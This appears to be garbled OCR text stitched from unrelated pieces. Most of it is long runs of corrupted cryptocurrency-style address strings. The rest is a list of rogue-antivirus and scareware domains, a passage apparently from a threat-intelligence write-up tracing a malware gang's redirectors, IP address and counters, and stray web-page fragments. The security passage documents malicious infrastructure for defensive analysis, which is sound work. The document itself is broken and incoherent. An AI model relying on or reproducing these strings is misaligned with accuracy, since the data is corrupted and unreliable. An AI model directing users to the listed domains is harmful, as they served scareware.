INswCuKwmM4hRfj4WSKDK25LjwF8WY3khp 
INswgLzbZHBzZKKzSkR5gg209xMUrQihQZy 
1NswySPtwm7MrFDTS9BFJ64ASxCewPCWW 
INsx6WVHaydq9m6ceHPCXpzaBtHBHwRB86 
INSXKRgutPa6n7wtwunFKDZq65EMkGP85q 
1INsyVfjmbaAZskJBnJPonNmLmrNhUoEWLm 
INsZvd5uqD1WHfrT9fdVUcow3FnMpNb5zC 
INT51NeJLZf9QdL2B69nTov9FhZAtwVvHKG 
INtSbUNwqFBk26f7JZNgHDbEjbCLqxXGkpx 
INT 7iS5bnEG9TXrNr9KMOWLtMVZ82s4bi6 
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INt9VExsDQBs2z4csawq9EajUEx7YJfEWK 
1INtajzYkgPsf5kEsXvx9GQBPwJRtk7Yfw6 
INtbKztCGEXng7UbxgctdDaeAWXPe9gbTZ 
LNtEN9DiWwri3DA1Cw3qT1FWzvVPAVTHtXx 
1INtfifLP2pLyBsevxnolefH6zaf]kxXzkdm 
LNTHmmDWmhC8GkKfMeok]Jsr6kQoHyFjhFle 
LNTnYA1g7fodgqNJoZMTHFkJhSy8HAsGmx 
LNTOUVWAQUoVEULUNivtfyPotAos668NF8 
INtp9y37tWGpibxUs4jSZLkKMnT4GRn9Txv 
LINTqaT3skX1ButcNrDX9qxo9V8Z3CzdPXh 
LNtqJJcrLxEjTkxRpJiKCMHFSomcfxXcQZ] 
LNtquPvHJcZN53vKZ4Ki9YimB6vFbC9nKf 
1Ntrg3eaeHBnvgZDqHjaDb2HZztF7r6Ltx 
LINtWBf3KD4dKmrHWtBqVorM4x68LP6ugXo 
LINTx2psdi6atiYHYNXTvzoYp4YGT6rxktg 
LNtYONrz1UY6BRS2Ce7zDE4o0dV9geq30eQ 
LNtYdMatxjdy8DHSCKUMeTVRVMHsm8Z8Bu 
LNU4FFjXQ438hsGPngw6kNNhrsoLYu2sQx 
LNu6bZFPquRytTipStFvBmjxCgwCGG6vmu 
1Nu83DdbnEvZPHXiDAZENpTAZ3HYPNLLUV 
LNu8cBHzcDJZXv4teLhGYt5QehQCM4aMsq 
LNu90Bf7ZQYHRQO54FWAkPsqZZMUSndRzu 
LNuAX52gyA7935dK4NrEUKyJ2rJZ19GNZe 
LNUbAgSCegv2tpHd9TAgJeTQZLJTFB42A0 
LNubgZYZ1xKGLL5KJrqfNcJ4mzJksnlWyg 
LNuCvUAWMNpPfRd3QD6eFWQNSFRYDpK5T2 
LNUd89ZUHjUAWfakaANWyjNSJUmXm5yB3W 
LINUDDeGsNK1MFB99fyxuu5X96MURk1V2pZ 
LNufW7bnprxXd3jhbwhNm9pZzTC475unAVm 
LNuHzPrP2hhBMVsAZtye9MKuQ7peSVKdiR 
LNUidK4hoAUXamfPiqNqRPAVGbbTUoZRAW 
LNUiz7630LY6qApdYYTuqUsf6h6UX4LUrh 
LNujACx7WWPz1fidRFJ6BZACB2VxNC2fSL 
LNUkigDc38dr2eKzkGpUkSUWaqtksmouT5] 
LNuKmiLRqkvjVZoPA9Mo8sYErtHSdtymjoh 
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totalspywarescan4 .com 
worldbestonlinescan5 .com 
megaspywarescan5 .com 
totalspywarescan5 .com 
hqvirusscanner5 .com 
warningmalwarealert5 .com 
hqvirusscanners .com 
antivirus-promo-scan9 .com 
worldbestonlinescan9 .com 
antivir-scan-my-pc .com 
becomemybestfriend .com 
bravemousepride .com 
antivir-scan-online .com 
emphasis-online .com 
justseethisonline .com 
futureshortsonline .com 


remove-all-pc-adware .com 
waitforsunrise .com 
funpictureslive .com 
justintimberlakestream .com 
antivir-my-pc-scan .com 
leading-malware-scan .com 
leading-antispyware-scan .com 
antivirus-promo-scan .com 
tryantivir-scan .com 
leading-antivirus-scan .com 
totalspywarescan .com 
worldsbestantivirscan .com 
awardantivirusscan .com 
winningantivirusscan .com 
tryantivirusscan .com 
worldsbestscan .com 
tryantivir-scanner .com 
worldbestonlinescanner .com 
tryantivirscanner .com 
tryantivirusscanner .com 
hqvirusscanner .com 
worldsbestscanner .com 
antivirscanmycomputer .com 
obbeytheriver .com 
obamanewterror .com 
warningvirusspreads .com 
watch2010movies .com 
primeareanetworks .com 
investmenttooltips .com 
executive-officers .com 
newsoverworldhot .com 
management-overview .com 
justthingsyouneedtoknow .com 
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LINUMJZ2vfrkhmCcCoFq6LB877vsFqrmmHT 
LNuMrboXnrhNpxWHpg7L2PUMCa5TVNsRSh 
LNuMtTjwVf2K66u93AuUJorbDTAZHjTpyN6 
1NunCCUKqbuEQEY7WftbQhdy85WG6gGLcv 
LNUnPKh3xtqco2NuQgma9pivup38FoFqSB 
LNUnyPmLwrwagvBBty]JHcTiXK93QWYkp4] 
LNUPHXjm5BwMxEQzqguArZTpmjJNLeQNSoY 
LNuTBkyJKJfR9kxsn6W8atYx6gUUMNrPLo 
LNutdRRwh1FmJ4RjrMurJkPLjJZAQYL9jv 
LNutHjgYyzWrfiTURZzqVeGNe5EYGmJLGae 
LINUTNZXkRpPJxg6TAZhUCWkfAYoj MHZHAx 
LNUuCiXEqxYNPiFdx6fnDagRwYfjPAtvoT 
INUV6DU3Z1MTyARGNXaAfWVDq2HVA61L9w 
LINuVjHpw3o0duSUmaqr1zNs8FPJZMdZhReSU 
LNUWSXP1dCRpkQHrxRYsJ3kqSGQ4EfPcUG 
LNUyKfexPHmt3rLTRFbckPZ2hwM2htCaEe 
INuYMUSD9Z6d7DQsfgM9bwAJM1YSuVPzm 
LNUzgsChRjK4K3ZHQf9FF6iHUAoUp5mc6u 
LINUZhKpnr49MfM9L97 0f8GmwF2x6BEK2iC 
LNuznhKK3YscRQ6GJ3htBEHZ8QpBwiwYHK 
INVIMUDCvBsmQeDh3Chv6CtYvS1D5wFSy1 
INV2FxHJhVeqVVmV9sykUh7MEKQjGNSw75 
INV9OMgjzk4sqUD12B2bzcZZq256MiRYf1g 
INvAMxLoQe153VrSxsyBykVVfepCJ53kJ5 
LINVcAtuvMm5HExr6QECj2dGm1D1UXnQw2T 
INvCDc4tdahTYNKrySAtsmfk2e8TieQK]] 
INVfS8ekvesV5ZbJeBTL8yK2e6SfpU0QYc 
LINVgEq65jVq6kjxxdkwiTfDdpPU6en6BGv 
INVGhf4bT)fdf5Ggk4Thw6Mh5MZq4bWeMY 
INVJuejUZdVNfjAlgaJq42Vezo4FngqxX7W 
INVkPPkcvwcDyUWSzRb9PFC7UaCqrvKVWs 
INVkRomNMhb3EZjBPFdh7Y9Tt9j4PpiLiE 
INVMKYBCgz50AZXSy]Vojc4WJPPoYDvjcy 
LINvMPRwzodobuXxXY8Mw9zTQdvtj2pc3iaT 
INVMR24GyooUWVDN7uRFi6KdMjwQyDfEDo 
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INVmwxqgRxd9WebcEhxiw7hbb6QuqzSxtSh 
LNVnUwhagqYjnuc92NBkwnnLm42ZePWed1X 
LINvP7rtWkEe1TGm1AaA2xhitlEQ6p38M36 
INVpexBP7 7wfgkndhRDzZCVBYHbiYb3MDJN 
LNvra2KKgPezJ5J3ZZN7QAKEekX95hqJPF 
INVs2So0zXLMrW5Yt3jbQFaTArdQ95k7BfB 
INvs3vaed4CT5FkpEbbvpPeGrueAyDjRil 
LINVS4GCcAjATG2Af1LKZUmNAZh5DDa58zSe 
INVT8T9tSsWZvS8wq7WkAi9VU800pzS9UW 
LINvU1Ubd7ZFb8bqspcVAo8hGfivzK7 3)FP 
LNvw9hmovA5WbfQPsafkqzgWQ4Z4CdiUBn 
LNvYCBgeaW/7GJXf25dr9781liyPWJQe8sgjB 
LNVycyPv9ChGWBKkVZZsjDPHEVrHD9hoPj 
INvYVc5tuymel1P9F3i9e9ITN2qgpc26Adyju 
1Nvzlyfs2bPdFTnw11GDaWyu67B3r4cbos 
LINVziygK70L9KAEQFA3HwxiDNShMUe$9ijs 
LINw2rfY5U0TjgH76kHb9xCwGcb6S9xHyaL 
LINw2Y8YRZjvB9zDPTauXa8p1JWKeTLbs2R 
LNw6dXSsYr3GZWfWkuGuu2FEs2FEHVtlev 
LNwDdmzRC76yVsaQ2mPrHvdZZTLnYsssmU 
LNwenwZ2RMkyDraqHnjLpammvV9CssePXdp 
LINWGRL1IM8CQCYM5vTobUedWVb1xByEjQzF 
LNwhSaD8DZqo5HFsUgf8mQGBVNs2r1Lirv 
LNwhuD8zkKiWyYZAhwGXYTtZsN9CjBCgQ3d 
LNWHuuZAXSXczo4We8BiajzXZjioCfcoosj 
INWij46GazH6EJ8Ek2hu9G1EIGRGzex9uG 
LINWiSWS9NAbbz990VFKXr2M5Fr6zDqpgpK 
INwkZtWkEDdWmo3zaQBzj31fK6B7iFBijJd 
LNWPcp5PrsHTUb6E6yntkevPsDTmz3PKfA 
LNwpCXLEJczrqsvjGUkpvGLJAQNVU2haBt 
LNwQ5AzqUfvpEQor7kFHLYods5oTbaxXZhw 
1INwq7e9ggpzjbs2fX3YRZFEWHXe5DWagiAv 
LNwSCPDbggcMwPXfVLp6WNaCg28RimZeVq 
LNwSTpCrvxAi6bukBzPiEV3SK9GnDOoAJrE 
LINWVa66VPkK7qTvscTibkYNumw8jWDocxvB 
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LNWvR5Ek6P7g34qNpUztbuS8rhkxMEjxZy 
LNWwusEfrsbfN3Vo3jYMpHq6KdDAkzojaQ 
LNwXaWPgKMFkXBqu4WUB8pl1lgJfx48k1vTR 


LNWxP2PWnKhhNCX7Wv3VGRKNbakBC5NS8P 
INX6MkWuy4DCbtrHQdeKpUQHMPFkQXhCGq 


INXaDtW8sk1xk4RaJKJ6adP7Pu6tXVYHLe 
INxCGZhw3Qgx2qPLiJRSQBWDMR2zKK3fR2 
INXDDQL4jHohQygU6WJC7qX5R7nN8DY2H51 
INXeK7sYayLQ8zS3vu8H5how89yGEyP8v2 
INxEvjJd2U3EdSyDFxM3K1JS1X5VbnHe7Ey 
INXFVaqjkNJjmCwZRpdvZ47ZeSVEa9jmb6y5 
INXHVpRuYZb4eAnzQ8HLHL4PMPNobQ/7Lfu 
INXhy1YhtPiDo8zqssYTAM60k7r1HF9JNu 
LINXiLFTtPUciKBcVqszwgiXvTcUUzuJoqo 
INXiIN9NGXpSssW6VyRfHozpN6cShZ4xuWb 
INxmEDMSs2mxCAHqbma/7eruaBfRUfxXwarf 
INXMTfHoxuRuZYA3 pij1Tf27)/goQVR7fQu 
INxnrBvrg2U6ArzGDvbL7DpLp1JzX5iHmR 
LINXPKjJSNxDH9Tx5sPwUK86unx2jonnAd6a 
INXtJH6ECSIEUVN93xXMFZ99KrbXndVwQE 
INXU8kTW1wiJmP7ak82uoasjvKNuzv1Dfr 
LINXuEHfaysijPJ]3gNF2xgLGQ2rhC3fUagV 
INxuMQLA863iWzeADnmsmYTKe6vK5CfESR 
INXVKEW1iLMTmheAsm3NcvT6FReGf1XBa8 
1INXwszBWsiDcbfLTmMEUrDHWLZjVp6n2baH 
LNxYhJxrUtbZZPRRjDYocxwNLK6TsTUVKW 
INxyJcUp2FeLp6KFonCaBQrS9BB31jrZUV 
1NxzlaDosZGbFJG3GKhH1b6spDWE9RjHsu 
LINxzNbMbjtwxZiuwExGFZLXsZMZTwWusFn 
LINY20bvK16yfZG2AdQYNJEj4c4gqhVKmY6 
LINY4QrTVgoKwfAxRS4PskfBYEGXU6WDqog 
LINY5KsFWRFtiyXLosy8V4esobFNSDDFH4g 
INY5m4hHCc6édt21gBTnpTrWbcvTN7MuRXV 
INyC1k86kwBMVwy5V4zTYZkuVFmcmEcNj5 
INydyBQ1k3Ej84s2kDG2JTSF3isYSNydXM 
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LNyFFHVU6RZsQdzcnkz6PAccTMa9x1H6Z2 
LNyH1TpPv7iwjBbSQQXW8n018DTt54aL7D 
LNyHqBK1bbS7YkXXotXC7orMmTvGjK9Vky 
LNYjbAqQaSbhmRUyxPo7umgqnmhZzwFyaiS 
LnYkwGhRCfmyAgwkCEAwkcYNjBGnZzcya 
LNyMvrBRwirLPtuL9QHK1Uiz6VdPj4zpDY 
LNYndPZEqVB84NhW2gXRRAQJfY 2tk9JQin 
LNynFQ4xAz1LypolmzHcDmmeEt4tkfc4eK5 
LNyoCQAVFz8jFkDusQdkVQX8eE5CRTukAo 
LNyoSVPjJdrwTEANgqo3aWgrhDB3HvDzE6 
LNYrXd4Wm42BW9rFc37vTCjfMvhPRvSOPG 
INYSZLnfelntHLecQTUgL9p4iDYXcF3npm 
LINyTtgpEeuH79m96T XpJChX4DU9FLQJONT 
LNyus6cF4DGTrnvECals8tcZeCUMpPkmrT 
INyUS7ptaZiWB4A39EhcFrzTMxnuPtVRoC 
LINYv14NGVUh4CgPKWp656XatnxxGzww5NF 
LNyVFfjpqkyYZYJxVUen22i3YLT46VVLki 
LNYVqdTSEjD25T8j9p5TdYs8PhN5UjpimD 
LNYvSpJzQsptdk24Vo99bRpFXjBXyB1LNW 
INywNV8Bwu3yiLUm459rrBANG54byboAiR 
INYYNDQmSgU3xRwMeen4FhuCjnof3Vuev) 
INZ2dfThZw91UxDAvTZWP]bXPXMThWp7bH 
LINZ5EvbX8zGfAMPkXPqN3AvbmqCTkX3RiJ 
1Nz8Sv57AV8N9GPKYnCECCorvs8q4LfFMp 
LNzajQPW8RZcJMLRJajqMR7PGeLWgaRQ5D 
1Nzaxg45FbonMr5y41rEtGuPSDNTVpz4vPN 
LINzZCYbwkGcW2pS641J1ciBxpwqG4uroR7n 
INZdHLZ6LEtbcYethriLJuy1KiE2s1fPgG 
INZdYPEeduVkCjETCLzxhm8t1zgzqvNVZu 
INZED3mXPyAk4VwXZHxrVp9aGE2 Tcgq7hQ 
1NzfFTIszspydTRRyMDPoQTBWKpH7dF5WV4 
INzgUr3XphwXyDMxxXicTAZrZwEQ]4huUtQt 
INzGVdu4ViP5psT2GjJMWeFYKVMgd8dvu75 
LNzgYfyKGbmfQBpMGoToMF2jQTyPqtSrML 
InZHKwcMDU75UxXFUJ39jYNYZGZSWYkK6H 
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INZhNFifeQ9TDFXSTBmmtgtB9cs3DnePXX 
LINZHNfMKmBrWEJm1lePvY2Femq76osxXqmrE 
INZhwDjHzgYQ2enZdEreuKLUE8BVPQ8vhN 
LNziZvCXdF79PKYWeELVByLMN4LKtq1laCj 
1NZJJ7gNxE8UKMoCFhNVM3PN7gDeznsfdF 
INZKw8r7jXrJVJkPUvsfpMteuJv2Km4dva 
INZKYENruUb26GZA6HYG9wX3kWbXuPbLC 
1INzLp9MopMoTwYeuRKfzLC6vZkKrG4oajt6 
INZnh3sWpHWrP5TjaSJFHYLBN9jNL61RRa 
1Nzpu8821gEBZBeF9xw7LmytUX5EHajuWE 
INZQGLLzxWumfnP2he2bQhdmxu4ka5i9Uj 
INZQMsJQDtc5QEmiL6KRUIdb2gVFbIAGjB 
INZR9qm7P2yZZnd4tS|KssvvbSJ1Ad8bPg 
LINZUAtfARFtKV6FthBQhEmwL4B26CWr7mC 
INZUFVgAYLQ1IDWWSqpWp6cKzn1VvvEbfsp 
INZUWkKuRbi5nWEW8Gz6prg5UnLD9HOQOrknf 
1NzZW566]1wa5oLiwa2Vuj7eCYdkFo64qK 
INZYBAkFbb]vtsPqrEt5vadcJ5BsM4gfLk 
INzYfwYNHzoRdG64X95vaQEuwvfcHzoxot 
INZZpfQbJwYYB2ndjmWjkJGmnCdipcYcTG 
lo6yi4X3zq6noZcbRPEVFSM5xgX8PW)Irs 
LoaiirwhKzm7jdatrEFYFJE4nCXiaenou 
LoAJKqmQ8Z9r7m1vs4Q6vzBswisRH6vks 
lobLv7EwivvQXe9JuEBjdnp9J5fGNnUdj 
1oBm7pctVXMGPRivH8AnUNYNn1T6km5iR 
lod69mrKda8LcuCJMEFn5HDC2FAbm9ch2 
lof TJjUckJS3EaqxdY7394tH4ANGKnQRJ4 
LOGMRNVHx9k3QArxwRu1XZsADipNs9U59 
LoNnaN9eEpxXf5CxaYM3p]JfiqYAYY 1iMtU 
LoNzPmuJH3LMWDjR9XzXzPy7EKLMhdszU 
Llookkg4bNdVdtNteW3BKcg1r3Rn9tjJyA 
LorojkFSqfb8QJZ6kvCPFoMw/7HigpnMDF 
lorvjbLisGfDt7JGKMbFBuAmmy1CtvJYh 
loSVeh7WDmPyMCbzrg8eWQ3ZBu2gSE8Gz 
lougDacFaqJJACPoldFdXyNVu6V9VWYR4x 
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lLovDUdSP6bLU32D5Rut6EFUGZ3L6bKf7C 
LoVJEvdPE1P)Rzr3vVhodiF4Sk4BdkNuu 
1P13aN6d9AkrzV1qZ74T2Tevdwhm8WfvBW 
1P19R2DJ1AeaVNkdt1ldRntphwY9WOQfFS7F 
1P1Bj1Qo0oM4qnGEscx4Wp61jFt2)KWaj9L 
1P1BPwJxv69X1Xy5C3bwfwNk7hnXKywguN 
1P1BVZF8MKRagALD5w7m166S4MpBcoRdj1 
1lp1lcAkCE9hov4rWRGAcag3AtndFiqg1R3 
1P1DyT9tfAh9C3cHr9PXbKNsCgwzuWWtTw 
1LP1jJfQEPHZgA1R6zgiYwAzJ2g74UMYHUEP 
1P1kSbV148zav3KgGMngqSDHvyz38FM4E6 
1P1qZLQcaH6GyfC6hwN6auCcs6Gbnr432C 
1PLUAXnB1xr12nN3zhZT2440vY6gulLh9UL 
1P1XJJfajXW5H1xsy5GXZ7hc4ZiHUSKjhB 
1PlyJNOBKUEPhqQ4s6umLjiSnkJfrff7XH 
1P23FnFkscSdwvH9QsczGMpBZWoG9TQTHi 
1P26dS4433Yx6NQTAewTUvwRUyjGQoxHak 
1P28WXM1j5rTFPHgimA6R1INBNZBXNiPcTW 
1P29xxkwy6wvLxJVA2cLoXBri2hZzaweSV 
1P2mtrYgPikhY6NEYZTWNs7HP4SZokcw9B 
1P2pHkKWU1RKazWkJZQRJN7HGeXBegCpVMC 
1P2qgoAmWCB6WmUDSDMN1i9Fhr7F8iEPmxi 
1P2Qpa3soNU1YEutXgdwNfPpurSmfUSJE9 
1P2TCx9Yc63ZSB2x6RUMxvtBfmzxeUiLcN 
1P2UC2Md42hXnAye7kajnn6bHKEIViWb8i 
1P2wLGVnhfBdWU8EQ|]SaGmu9LE6eWwZHbq 
1P2XVS7LEwkm3ehSeNMKGhNj9y2e9j1hDj 
1P2ybMzfBxEEiCv89DUABT xuTyKxZzFJiz 
1P3akKqDYXtrB59Up9ks7aZDsgr3Quf2jxw 
1P3bWT24QKHHo2YcqsjJecx86tdSEki51dP 
1P3EFkuZ63twWsvzfEHCb7w6NMrDt2rg1G 
1P3GTrPLP1zykjrrl1URdkgodjzGioDBB3a 
1P3hp6ew9gZoxaMvv7H9jDUQNVSXXxhEIr 
1P3LrSvZ5klyw44178vesZABU4i1SkTb67 
1P3n6Jv2ucbtd55DTHEIQGQayGAdGHnEVp 
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1P3nN6Km1iLR1LRR2gtiBSTOKNLwW3zoUhn7 
1P3RB5ujkHoLeePQjjKGLNJf7k1zZ11c88z 
1P3SBgE4uhcoh7FqYMsj6gYmxN2mqDf2qu 
1P3UbG99x9XjTtYYDJ5xwBo2sjJYxRLJot2 
1P3y5Bp7T6GBZWzSqz68nxkZN3QP1E6Ljy 
1P434nUqWjvDzZQZMXxVZEYYNR4EP7VCGkn 
1P43FEJH7vXhmXFvRc7j6BcjVFFU432m4R 
1P44rC7wjjW4NVizsYfV4VKEPiIS6hpZevp 
1P457riMcFQuJraPvopP5FEaadMvkKpaD6 
1P482m8iPj/GVHX6wWLRVWiH2bup4D5buiw) 
1P4AU7EwrCWDe8CzZTWPhN3RtoTnVrfHuwM 
1P4bjkFcdwjYWvGdNrLaD5F9zwxrg2YHUv 
1P4cZhrZ4GZjS9JsBQyVYsPXUnSkJSMJRF 
1P4gztdjrzBvZ66] XbUptREFYsocrwqYYe 
1P4hVnySdB4pTmr2HjCtxFtqG3Ggj5bzNn 
1P4JA2HruVqdjxZ14hfUC1CbcDNbjVC7pxX 
1P4L712Z262qKiIEVHq2QS65K39wLhhDuUifp 
1P40luvluRAqwCNef8rZvgPUTJwZ8pv5uZ 
1P4sizjZhotzMLtPpQtBmulhs8jGZ6NPvZ 
1P4TKs7bMYy6FtlLWyKxTR1CjdU9gz4VCWv 
1P4wN7rGYCjDunZ8XDRUPUr3fyRCD94 iF f 
1P4wU3HaZT2ANajv4cnC2VD8t1WVUd4e09 
1P4X5RHaazKdpczGfaegHSGRkwRgxBhmvC 
1P4XFHz8e7b80Snmpb6uGptfWjip1uLQBAP 
1P4ycNpZxw1lLAHAYCFzswugGXK4ULYY7tp 
1P52Hgptcnre8ejGZ6GtHsdwLQP9fPP3M9 
1P52Q3nG5sfsQ6N2feWxGe74sBy8XM7hSU 
1P59ZeeJsuxfulKywMuKEqge7rTRbC}7uw7 
1P5aE5SmeUjWhyXboPsUG45DqxBRZWEBeD 
1p5bd3QwEVkMd7iSTCRLJ2fZ2V6HQ7whKo 
1P5BQ16UjFuye6mw29gqk83uz4sRhDvc5V 
1P5cAa3WDHsfNBEVhknmaeRK3UslbmE9qs 
1P5E3kqqJ2qauVWP3xuhekZUveUAUrEQXq 
1P5e065QL4KFf4uSysGPvCY3GH4tzqBbPx 
1P5jweSMEfDhqa9P8yRJjif4Xu2qcLsdBpg 
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1P5KhnM5Xo0Z65AUnXPbBJnyLs7DeSmgtSK 
1LP5LhbgN2GBvHpE2rSm2ksYQYjCk9bruWY 
1P5nuUCPURgsmJnifDqizbKiFMBE4bo3x] 
1P5uM5a24mtFqgXbaQBNgfCkyFzZQ8uF low 
1P5VRebqziCjfxa2PaSqqsWa8v8MVQuiyd 
1P5Wv4tagUS7wCNHpBpBfGoya9webqmAd4 
1P67K39XScQAz5pwSvMChAwpDj9BRVMBuD 
1P6DeutTyKiwhAZY61vZQn9ZkhXVgkDi3b 
1P6GD) 7NwsDygz6tyKPDGEuh4GRA6aXrgQ 
1P6HDx4Qkpwwk9vtQmueQEnrPRotTnryirk 
1P6jjwkAH20FWyTBcckKgLkwEPPttDnMsy 
1P6KX5bThrTJW8K9ZL8AVVFIgGT3fCiKGn 
1LP6EMD5TjAAGA24qH5CjojM8yXxCBtrLLgy 
1P6NEjcwtYYoS2TYngazZxnPsVDyuBsoer 
1P6SkvVEHHHpxNZm85PnuC8CYzvXvyy32w 
1P6sPUSQ2GVvkzzr389WvwL6BuU8Wihn7M 
LP6WMYMMVivvN2P39u6YhPtmzLgHwZZpA5 
1P6wow5dix4BalKfveDdDRXcjtocfdevNi7 
1P6XffEte6Pcgk1t4aSGXSGU9q5RrHQkdp 
1P6XVanDW36eSKBDp6sJoaikKbmanXCgNrd 
1P781FMF6sPGpUaNQZTJsVpYXkm1imiDMVh 
1P7A3tqZTBXt8zfTf]PkKINZCRFJKUV5N9OR 
1P7a7j908nqnVW3SS7xHcUbAIAAxcDVznK 
1P7b3cF72EdLJ4AK1ReL3xH4iQRC7ijlHm 
1P7BJRMRjGShscAiMaNEEnm42niiiSWYEx 
1P7gekgbWjHX453jNFdNr4q31qrCTRfE2V 
1P7gWV4MMZiSS6piiBD1VonL1w1tGU71Cu 
1P7hSuHbj8fF9AI0VJViaydLDbFAFVMdtx 
1P7j2s4E74Mk3r8EJ7RVOGHVZZ4poifats 
1P7LK7R16yDodkHk8KNbvnvayMdqTHBrW8 
1P7TTkyYWgVnuPjQzGvTRnWj4mNqxQp6Xv 
1P7WSUHCFi3PjqrBkKSDDkK1TisT3KoT7RZ 
1P7YysRBNtM2U5Tmw46ddhytFaFEDP6iPR 
1P82fQQH38XLhic95PcCQYxPRWAdP9Y9YrQ68 
1P8bDyGEh7cuhUhMg7ZmB4ojefCm1Hz39S 
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1P8cdad9Xv7537417Mi8u9bgxwzBVNdwVo 
1P8ELiJX33ZJhxFL1CSPBVzj7PmMQaD34cX 
1P8g5Rht2vBg43R5xXf4ijASwZSYbVDngoK 
1P8JPMfMv8kPTtze4tw13WQBScf25AiDWJ 
1P8k1K73JAyBFG3GnrdM6Ym8Fo3jTijj1k 
1P8SvnefpL1jniPxsAPGFcaL5z6nL8hyjg 
1P8SYN9pqDFh21MNi84QvBvYmuAdM1DSLC 
1P8tied279pZMvmou683TodnYnAJ3BRrH7 
1P8uDkPga9SFaD1c6sPvla4c6uUWNH9zgwb 
1P8VAF7cGDerZHNVCWAE3kQS1GxzsjMVHh 
1P8wbsgxgugqgsiEp1F4PUkKBdiAPloiNyqr 
1P8WSbDV7RCWtYX1XKfAp3nVrr6bHNcGjNn 
1P8y33qvpnx8ZgRT 4f4feVJKxvZk7kSVwc 
1P93UaufrNBxB3uDGJcGAmAFf1hRqdfaNi 
1P983N85jzsRA43pDa7qYguCPdzRGL9UTb 
1P9azgBLQt5yp975DB4K4Zis4BtawQyn4m 
1P9bCXJvkuooxXrP7ZcEjPJBvXgnvFMM3wN 
1P9cCU3VWON931e3KPQM3YEsS97XmnD6AGY]J 
1P9GrvkuUUCDXMYgT6u5saerTask8WPtSZg 
1P9h1HB1E7g4qLa3iJ6JNrGBGUHQbbD38R 
LPOHKVyMHAf6PRCMDQazcM6o0ZUqqnMsqY9 
1LPONrUxQKT4e4o0RTJLNVawi7gtrWh6rTVi 
1P9pHJPtu2FmGrqHE1JARpnBhUMBmDc9sP 
LPQUUHfa4XigCu6yVjynIsYbF8gUnjbv7y 
1PA3eVhs87cpgaCCQh5LsGjrAw2ANKHQyF 
1PAAUP8HPhYCCGkU6UNdQoZ1cK5eBtFaP3 
1LPACRVHWDsMPbMfc42v6DHCKpBbCgkNQsd 
1PADi7fZMPVNtxUGMu38hm74wCYVUJxNaZ 
1PadvVgmMHzEmuGwd1XRFtWqGRsk5zXvg3 
1Paem5x2M5acXy4FMStPm4kFEcjS9JWV3w 
1PajamUTmyp2JrjjziBWERuVtBQHg1Pdzk 
1PAkqAuBp5edeDLTewSal14jH2R6zd6AVWT 
1LPAKYyXVMgFi2gEhn4zUg2PFhzbFG2Q7eq 
1PAMrxvmEuRfgLwZuw4pVRTqKnwFQTD7BB 
1PapzQT63gf8LBnaRN2v3MxR8MwfWPpbNZ 
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1LPArPjJxxWuxL5 1krZJHZ9piaW7E8TCgx6 
1PaTgpbSHPRKp9DA5Zrb9FUfca9EJo2MZz 
LPAVBknpDowSYJuMjizwJwgjrEZK2y9yQa 
1PAxyo5BtPSfTy9SbNhchvRMPNjgtY5cPM 
1Pay51xWJHvVuxgNGxqpgcHrGVBPLUH7qg 
1LPAyh7BjB9o0j6icj TGCWjyYmLta8HyfMTS 
1PayrkSnLX9Frcnet2ikPomaPBHUwc3SMY 
1PB65kNqSb1Er9Yn67zPomhcF1bv5cS88r 
1Pb8yDLm14jB1ck76qRBh1xeuDGayKezhq 
1PbA1AkwySob6DxoVoV7yrLLRjh3bBtdGP 
1PBaR15ul17aiRXeaJaDkz2foapjcwaqfivo 
1PBbgFDKfyDSGzZQAN7BnFa27nwDJGKZDR 
1PBC2EWm3MgilhCfJEhCjoKkiMFWvVENmg 
1Pbc3NHSWzZzCbHdZJXNAx5CASVoYLg1MM 
1PbegoWUuhEW39tnkQ2uFqmmd9iTUuRsn21 
1PbENSZC3SwiNch9kErlvxKqYuSrzuf7YS 
1LPbEXjyowJ1Ae4WswhGCcuckWLQny7ywhW 
1PbF6tWwG5akCwejiojU2xBEaji495wGYK 
1PBgNLynuCkkeapykGq4hDrWqRWAQSKJ8Z 
1PbGtXBPRUHwwB4K7WHB86ZyHM8LBUTDQE 
1PbhxAzQAwcAbad7TPMLak6y22zZ6TQWT6S 
1PBJAR43RzrxCCPGiSTPE3cocigdyytrZQ 
1PbJKqZrdvytcDgDQ3z1Ftj9DDhKs5npJB 
1PBJqatYF9g3YYtyKM2u8VA1LVYAHhwUgcT 
1PbKQqNsg95jiZQWZk71wWLPP5vDPr9V657 
1PBL7PPTkcMxpTZ4XAt6unytcGMSHKp6wm 
1PbM8SvV8LbLDQJUBXTHojT1frqshYVgcw 
1LPBmkV8mXHu3DhxsSjwW5rsZJBGMCDxFCYx 
1PBnLN5nEii7D2LaF54RHsiXbAohYoQ4uT 
1PbnSDMsTJCvtWkz5vxyC618sjA7rQzpp3 
1Pbow7U693kjHLkjMC2QCi3JuinGN2FHmb 
LPBQVQX5v8MirkxvzD9bJAt4ca68WYCApU 
1PBRHJ1g7vcSvg7eNxaRHDkCsobTeXUZRH 
1PbsN54fNPTtmRFyxBmL4z56HNcJ2rRTiw 
1PbuMcEK4HtP4D1Z1SVPf8ZuV4ojwXGdsr 
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criticalmentality .com 


In between the central redirectors, counters from known domains affiliated with the 
Ukrainian fan club are also embedded as iFrames - sexualporno .ru/admin/red/counter2.html 
(74.54.176.50; Email: skypixre@nm.ru) leading to sexualporno .ru/admin/red/mwcounter.html. 
Parked on [10]74.54.176.50 are related domains that were once using the [11]ddanchev-suck- 
my-dick.php redirection, such as sexerotika2009 .ru; celki2009 .ru; seximalinki .ru and 
videoxporno .ru, as well as the de-facto counter used by the gang - c.hit.ua/hit?i=6001. 


chris brown on cnn 


Google chris brown on cnn 
rCAN J terest be Set Out Ove sma ound Say Dora 


Mixx 


Digg 


Yahoo 
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oracle iphone 
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year ysr alive jbs sa 
joe cox delta fair | 


do i did 


NOKIA 5 Millionen Songs 


Does this admin/red directory structure ring a bell? But, of course. In fact the ddanchev- 
suck-my-dick redirectors originally introduced by the Ukrainian fan club are still in circulation 
- for instance not only is videoxporno .ru/admin/red/ddanchev-suck-my-dick.php (parked at 
the very same 74.54.176.50) still active, but the gang has pushed an update to all of their 
Campaigns, once again establishing a direct connection between previous ones and the 
ongoing "News Items" themed one. 
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1PBuUjB5rBVuneDDmYy7Z3fzi4zidq/SmA 
LPBVQJiYrl1Btqo1lFoXXzXk2beFT8)]KAwfm 
1PbvRbjJoNyQwup]puvufPLM2i3steQ7TF 
LPBVvkFb23mJTQdqXymAi2mPZE5CdnZHxx 
1PByzaVYw5SsucMtSZQCRuzMH/7jLdi5SrNX 
1Pbz1wbhFFxBixhsVSstzASB1tq4A7Wa2L 
